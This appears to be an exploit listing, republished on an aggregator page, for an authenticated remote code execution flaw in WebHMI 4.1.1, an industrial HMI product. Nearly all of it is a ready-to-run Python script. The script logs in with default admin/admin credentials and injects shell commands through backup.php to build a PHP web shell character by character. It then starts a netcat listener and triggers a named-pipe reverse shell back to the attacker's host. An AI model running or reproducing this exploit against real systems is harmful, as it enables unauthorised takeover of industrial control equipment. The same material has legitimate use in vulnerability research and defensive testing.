[webapps] WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)

2 years ago 153
BOOK THIS SPACE FOR AD
ARTICLE AD
# Exploit Title: WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated) # Date: 03/01/2022 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://webhmi.com.ua/en/ # Version: WebHMI 4.1.1.7662 # Tested on: WebHMI-4.1.1.7662 #!/usr/bin/python import sys import re import argparse import requests import time import subprocess print("\nWebHMI 4.1.1 - Remote Code Execution (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n") print("Level2 account must be enabled !\n"); login = "admin" password = "admin" class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): reverse = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" payload = "<?php+system($_GET['c']);+?>" headers_login = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'X-WH-LOGIN': login, 'X-WH-PASSWORD': password, 'X-Requested-With': 'XMLHttpRequest', 'Connection': 'close', 'Content-Length': '0' } url = 'http://' + target_ip + ':' + target_port r = requests.Session() print('[*] Resolving URL...') r1 = r.get(url) time.sleep(3) print('[*] Trying to log in...') r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True) time.sleep(3) print('[*] Login redirection...') login_cookies = { 'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'], 'X-WH-CHECK-TRIAL':'true', 'il18next':'en', } r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies) time.sleep(3) print('[*] Bypassing basedir...') for i in range(0, len(payload)): #print(payload[i]) rp = r.get(url + '/setup/backup.php?sync=`echo%20-n%20"' + payload[i] + '">>cmd.php`', cookies=login_cookies) time.sleep(0.2) print('[*] Setting up listener...') listener = subprocess.Popen(["nc", "-nlp", self.localport]) time.sleep(2) print('[*] Executing payload...') time.sleep(1) print('[*] Waiting reverse shell...') r4 = r.get(url + '/setup/cmd.php?c=`' + reverse + '`.bak', cookies=login_cookies) if (r4.status_code == 200): print('[*] Got shell!') while True: listener.wait() else: print('[-] Something went wrong!') listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='WebHMI 4.1.1 - Remote Code Execution (Authenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()
Read Entire Article